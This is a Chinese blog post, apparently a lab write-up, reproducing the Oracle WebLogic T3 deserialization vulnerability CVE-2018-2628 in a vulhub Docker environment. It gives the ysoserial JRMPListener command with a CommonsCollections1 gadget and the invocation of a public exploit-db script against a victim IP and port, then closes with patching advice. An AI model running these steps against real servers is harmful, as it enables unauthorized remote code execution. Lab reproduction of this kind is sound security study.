漏洞复现|Weblogic反序列化命令执行漏洞(CVE-2018-2628)

作者:村里的小四
免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。

0x01 前言

NVD:Oracle 中间件的 Oracle WebLogic Server 组件(子组件:WLS 核心组件)中的漏洞。漏洞允许未经身份验证的攻击者通过 T3 访问网络来破坏 Oracle WebLogic Server。

0x02 影响范围

10.3.6.012.1.3.012.2.1.2  12.2.1.3

0x03 环境准备

vulhub靶场环境:CVE-2018-2628

0x04 漏洞复现

4.1 启动环境

访问http://your-ip:7001/console,初始化整个环境。

在这里插入图片描述

4.2复现

首先下载ysoserial,并启动一个JRMP Server:
ysoserial:https://github.com/brianwrf/ysoserial/releases/tag/0.0.6-pri-beta

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1

其中,[command]即为我想执行的命令,而[listen port]是JRMP Server监听的端口。
在这里插入图片描述
利用该exp进行攻击

https://www.exploit-db.com/exploits/44553

使用exp脚本,向目标Weblogic(http://your-ip:7001)发送数据包:

python exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]

[victim ip][victim port]是目标weblogic的IP和端口,[path to ysoserial]是本地ysoserial的路径,[JRMPListener ip]和[JRMPListener port]第一步中启动JRMP Server的IP地址和端口。[JRMPClient]是执行JRMPClient的类,可选的值是JRMPClient或JRMPClient2。

在这里插入图片描述
在这里插入图片描述
exploit.py执行完成后,执行docker-compose exec weblogic bash进入容器中

查看容器id:docker ps -a

列出容器:docker ps

使用容器ID进入容器

docker exec -it 容器ID /bin/bash

在这里插入图片描述

0x05 修复建议

建议用户时刻关注官方通知的补丁,及时打补丁,禁用T3协议,禁止T3端口对外开放。

0x06 了解更多安全知识

欢迎关注我们的安全公众号,学习更多安全知识!!!
欢迎关注我们的安全公众号,学习更多安全知识!!!
欢迎关注我们的安全公众号,学习更多安全知识!!!
在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

灼剑(Tsojan)安全团队

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值